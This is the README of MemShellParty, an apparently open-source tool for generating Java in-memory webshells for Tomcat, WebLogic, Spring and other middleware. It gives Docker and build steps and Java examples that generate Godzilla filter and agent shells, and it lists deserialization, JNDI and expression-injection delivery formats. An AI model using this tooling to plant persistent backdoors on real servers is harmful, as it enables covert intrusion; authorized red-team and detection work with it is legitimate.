English | 中文
Warning
This tool is intended only for security researchers, network administrators, and related technical personnel for authorized security testing, vulnerability assessment, and security auditing purposes. Using this tool for any unauthorized network attacks or penetration testing activities is illegal, and users are solely responsible for any resulting legal consequences.
Tip
As I primarily focus on security product development and lack extensive real-world combat experience, please feel free to raise an issue or join the Telegram group if you have questions about usage, implementation, or adaptation requests. Let's learn and exchange ideas together!
MemShellParty is a self-hosted, visual platform for one-click generation of java memshell for common middleware and frameworks. It also aims to be a comprehensive learning platform for java memshell. In an era full of wheels, it's time to build the car and accelerate together!
What you can learn or try from this project:
- Learn to write java memshell for common middleware and frameworks.
- Learn to use Testcontainers for Java application integration testing.
- Learn to use GitHub Actions for CI/CD, write CHANGELOG, and automate Release publications via CI.
- Try using Byte Buddy to generate classes and write Agents.
- Try using Gradle to build Java projects (using platform for dependency version management, toolchain to compile JDK 6 source code even in a JDK 17 environment within the root project).
- Non-Intrusive: Generated memshell do not interfere with the normal traffic of the target middleware, even when multiple different shells are injected simultaneously.
- High Availability: Comes with comprehensive CI integration tests
- Minimal Size: Strives to minimize memshell size for efficient transfer.
- Strong Compatibility: Covers common middleware and frameworks encountered in offensive and defensive scenarios.
Suitable for users who just want to try it out. Please use with caution on public services, as generated memshell might potentially contain backdoors if the service is compromised.
Access directly at https://party.memshell.news. The latest image is automatically deployed with each release.
Ideal for quick deployment on internal networks or local machines. Using Docker is fast and convenient.
After deploying with Docker, access the service at http://127.0.0.1:8080
# Pull the latest image from Docker Hub
docker run --pull=always --rm -it -d -p 8080:8080 --name memshell-party reajason/memshell-party:latest
# Pull the latest image from Github Container Registry
docker run --pull=always --rm -it -d -p 8080:8080 --name memshell-party ghcr.io/reajason/memshell-party:latest
# If network quality is poor, use the Nanjing University Github Container Registry mirror
docker run --pull=always --rm -it -d -p 8080:8080 --name memshell-party ghcr.nju.edu.cn/reajason/memshell-party:latestThe image is stateless. To update to the latest version, simply remove the old container and create a new one:
# Remove the previously deployed container
docker rm -f memshell-party
# Use the previous deployment command to redeploy (it will automatically pull the latest image)
docker run --pull=always --rm -it -d -p 8080:8080 --name memshell-party reajason/memshell-party:latestSuitable for integrating memshell payload generation into your existing tools. Supports JDK 8 and above (since v1.7.0).
- Add the dependency using Maven or Gradle:
<!-- Maven Repo-->
<dependency>
<groupId>io.github.reajason</groupId>
<artifactId>generator</artifactId>
<version>1.7.0</version>
</dependency>// Gradle Repo
implementation 'io.github.reajason:generator:1.7.0'- Example1: Generate a Tomcat Godzilla Filter memory shell:
ShellConfig shellConfig = ShellConfig.builder()
.server(Server.Tomcat)
.shellTool(ShellTool.Godzilla)
.shellType(ShellType.FILTER)
.shrink(true) // Shrink bytecode size
.debug(false) // Disable debug mode
.build();
InjectorConfig injectorConfig = InjectorConfig.builder()
// .urlPattern("/*") // Custom urlPattern, defaults to /*
// .shellClassName("com.example.memshell.GodzillaShell") // Custom shell class name, random if empty
// .injectorClassName("com.example.memshell.GodzillaInjector") // Custom injector class name, random if empty
.build();
GodzillaConfig godzillaConfig = GodzillaConfig.builder()
// .pass("pass")
// .key("key")
// .headerName("User-Agent")
// .headerValue("test")
.build();
GenerateResult result = MemShellGenerator.generate(shellConfig, injectorConfig, godzillaConfig);
System.out.println("Injector Class Name: "+result.getInjectorClassName());
System.out.println("MemShell Class Name: "+result.getShellClassName());
System.out.println(result.getShellConfig());
System.out.println(result.getShellToolConfig());
System.out.println("Base64 Packed: "+Packers.Base64.getInstance().pack(result));
System.out.println("ScriptEngine Packed: "+Packers.ScriptEngine.getInstance().pack(result));- Example2: Generate a Tomcat Godzilla AgentFilterChain memory shell (Agent type):
ShellConfig shellConfig = ShellConfig.builder()
.server(Server.Tomcat)
.shellTool(ShellTool.Godzilla)
.shellType(ShellType.AGENT_FILTER_CHAIN)
.shrink(true) // Shrink bytecode size
.debug(false) // Disable debug mode
.build();
InjectorConfig injectorConfig = InjectorConfig.builder()
// .urlPattern("/*") // Custom urlPattern, defaults to /*
// .shellClassName("com.example.memshell.GodzillaShell") // Custom shell class name, random if empty
// .injectorClassName("com.example.memshell.GodzillaInjector") // Custom injector class name, random if empty
.build();
GodzillaConfig godzillaConfig = GodzillaConfig.builder()
// .pass("pass")
// .key("key")
// .headerName("User-Agent")
// .headerValue("test")
.build();
GenerateResult result = MemShellGenerator.generate(shellConfig, injectorConfig, godzillaConfig);
System.out.println("Injector Class Name: " + result.getInjectorClassName());
System.out.println("MemShell Class Name: " + result.getShellClassName());
System.out.println(result.getShellConfig());
System.out.println(result.getShellToolConfig());
byte[] agentJarBytes = ((JarPacker) Packers.AgentJar.getInstance()).packBytes(result);
Files.write(Paths.get("agent.jar"), agentJarBytes);- For a unified generation interface example, refer to GeneratorController.java
Compatible with Java6 ~ Java8, Java9, Java11, Java17, Java21
| Tomcat(5 ~ 11) | Jetty(6 ~ 11) | GlassFish(3 ~ 7) | Payara(5 ~ 6) |
|---|---|---|---|
| Servlet | Servlet | Filter | Filter |
| Filter | Filter | Listener | Listener |
| Listener | Listener | Valve | Valve |
| Valve | ServletHandler - Agent | FilterChain - Agent | FilterChain - Agent |
| FilterChain - Agent | ContextValve - Agent | ContextValve - Agent | |
| ContextValve - Agent |
| Resin(3 ~ 4) | SpringMVC | SpringWebFlux | XXL-JOB |
|---|---|---|---|
| Servlet | Interceptor | WebFilter | NettyHandler |
| Filter | ControllerHandler | HandlerMethod | |
| Listener | FrameworkServlet - Agent | HandlerFunction | |
| FilterChain - Agent | NettyHandler |
| JBossAS(4 ~ 7) | JBossEAP(6 ~ 7) | WildFly(9 ~ 30) | Undertow |
|---|---|---|---|
| Filter | Filter | Servlet | Servlet |
| Listener | Listener | Filter | Filter |
| Valve | Valve(6) | Listener | Listener |
| FilterChain - Agent | FilterChain - Agent (6) | ServletHandler - Agent | ServletHandler - Agent |
| ContextValve - Agent | ContextValve - Agent (6) | ||
| ServletHandler - Agent (7) |
| WebSphere(7 ~ 9) | WebLogic (10.3.6 ~ 14) |
|---|---|
| Servlet | Servlet |
| Filter | Filter |
| Listener | Listener |
| FilterManager - Agent | ServletContext - Agent |
| BES(9.5.x) | TongWeb(6 ~ 7) | InforSuite AS (9 ~ 10) | Apusic AS (9) |
|---|---|---|---|
| Filter | Filter | Filter | Servlet |
| Listener | Listener | Listener | Filter |
| Valve | Valve | Valve | Listener |
| FilterChain - Agent | FilterChain - Agent | FilterChain - Agent | |
| ContextValve - Agent | ContextValve - Agent | ContextValve - Agent |
- Godzilla
- Behinder
- Command Execution
- Suo5
- AntSword
- Neo-reGeorg
- Custom
- BASE64
- GZIP BASE64
- JSP
- JSPX
- JAR
- BCEL
- Built-in ScriptEngine, Rhino ScriptEngine
- EL、SpEL、OGNL、Aviator、MVEL、JEXL、Groovy、JXPath、BeanShell
- Velocity、Freemarker、JinJava
- Native Deserialization(CB and CC)
- Agent
- XXL-JOB Executor
- Hessian, Hessian2 Deserialization (XSLT gadget chain)
- JNDI
- JDBC Connection
- Other common deserialization
Suitable for developers who want to modify the code. Clone the repository locally and build the frontend and backend projects.
First, you need to download and install bun, a tool for building the frontend service.
- Clone the project using Git:
git clone https://github.com/ReaJason/MemShellParty.git- Build the frontend project. After the build finishes, static resources will be automatically moved to the Spring Boot module.
cd MemShellParty/web
bun install
bun run build- Build the backend project. Ensure you are using a JDK 17 environment.
cd MemShellParty/boot
./gradlew :boot:bootjar -x testAfter building, you can directly run the JAR file located at MemShellParty/boot/build/libs/boot-*.jar (the exact version might vary).
cd MemShellParty/boot
java -jar \
--add-opens=java.base/java.util=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
build/libs/boot-1.0.0.jarAlternatively, you can build a Docker container from the built artifacts:
cd MemShellParty/boot
docker buildx build -t memshell-party:latest . --load
docker run -it -d --name memshell-party -p 8080:8080 memshell-party:latestSuitable for users who want to build with custom access paths, for example, when using NGINX as a reverse proxy (#44).
Download the Dockerfile from the project root.
- VERSION: Version information (arbitrary, suggest using the latest tag; used for frontend display).
- ROUTE_ROOT_PATH: Frontend root route configuration (e.g., /memshell-party).
- CONTEXT_PATH: Backend access prefix (e.g., /memshell-party).
# Basic build (defaults to root path "/")
docker buildx build \
--build-arg VERSION=1.7.0 \
-t memshell-party:latest . --load
# Run the basic image, access at http://127.0.0.1:8080
docker run -it -d -p 8080:8080 memshell-party:latest
# Build with custom access path (e.g., /memshell-party)
docker buildx build \
--build-arg VERSION=1.7.0 \
--build-arg ROUTE_ROOT_PATH=/memshell-party \
--build-arg CONTEXT_PATH=/memshell-party \
-t memshell-party:latest . --load
# Run the custom path image, access at http://127.0.0.1:8080/memshell-party
docker run -it -p 8080:8080 \
-e BOOT_OPTS=--server.servlet.context-path=/memshell-party \
memshell-party:latestIf you need to use NGINX as a reverse proxy, first build the container with a custom access path. Then configure NGINX similar to the following:
Ensure that the location /memshell-party、ROUTE_ROOT_PATH=/memshell-party、CONTEXT_PATH=/memshell-party and
BOOT_OPTS=--server.servlet.context-path=/memshell-party all use the same path.
location /memshell-party {
proxy_pass http://127.0.0.1:8080;
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-By $server_addr:$server_port;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_http_version 1.1;
proxy_connect_timeout 3s;
proxy_read_timeout 300s;
proxy_send_timeout 300s;
proxy_buffer_size 16k;
proxy_buffers 8 64k;
proxy_busy_buffers_size 128k;
}
Any feedback or issue discussion you provide is a contribution to this project.
It will be so nice if you want to contribute. 🎉
- If you have strong Docker environment building skills, consider adding integration test cases related to specific CVEs.
- If you are skilled in writing memory shells, try adding support for a new type or target.
- If you have extensive practical experience, feel free to open issues with suggestions or improvements.
For project structure, build processes, and compilation details, please refer to CONTRIBUTING.md。